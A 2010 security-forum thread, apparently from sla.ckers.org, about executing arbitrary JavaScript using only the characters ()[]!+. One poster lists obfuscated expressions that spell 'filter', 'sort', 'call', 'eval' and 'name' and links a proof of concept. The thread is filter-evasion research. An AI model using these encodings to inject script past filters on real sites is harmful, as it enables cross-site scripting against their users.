c:[[][[[[]==[]]+[]][+[]][+[]]+[[][+[]]+[]][+[]][++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]+[[[]==[]]+[]][+[]][++[++[+[]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][+[]]+[[+[]==+[]]+[]][+[]][++[++[++[+[]][+[]]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][++[+[]][+[]]]]+[]][+[]][++[++[++[[]][+[]]][+[]]][+[]]]

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: LeverOne
Date: July 14, 2010 04:36AM

Since the direction of the char "=" is now a dead end, the optimal set is ()[]!+

The example uses this way for getting a reference to window : http://sla.ckers.org/forum/read.php?24,28641#msg-33323 and these letters http://sla.ckers.org/forum/read.php?24,32930,page=2#msg-33286.

POC: http://pastebin.com/eaVsamTH
Length: 1825


f: (![]+[])[+[]]
i: ([![]]+[][[]])[+!+[]+[+[]]]
l: (![]+[])[!+[]+!+[]]
t: (!+[]+[])[+[]]
e: (!+[]+[])[!+[]+!+[]+!+[]]
r: (!+[]+[])[+!+[]]

s: (![]+[])[!+[]+!+[]+!+[]]
o: (!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]
r: (!+[]+[])[+!+[]]
t: (!+[]+[])[+[]]

c: ([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]
a: (![]+[])[+!+[]]
l: (![]+[])[!+[]+!+[]]

e: (!+[]+[])[!+[]+!+[]+!+[]]
v: (+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[!+[]+!+[]+!+[]+[+[]]]
a: (![]+[])[+!+[]]
l: (![]+[])[!+[]+!+[]]

n: ([][[]]+[])[+!+[]]
a: (![]+[])[+!+[]]
m: ((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!+[]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]
e: (!+[]+[])[!+[]+!+[]+!+[]]

----------------------
~Veritas~

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: Gareth Heyes
Date: July 14, 2010 05:48AM

@LeverOne

Noooooooooooooooooooooooooooo we can do it somehow!!!!!!!!!!!!!!!!!!!!!!!!!!!

We just need a "p" && "_" :(
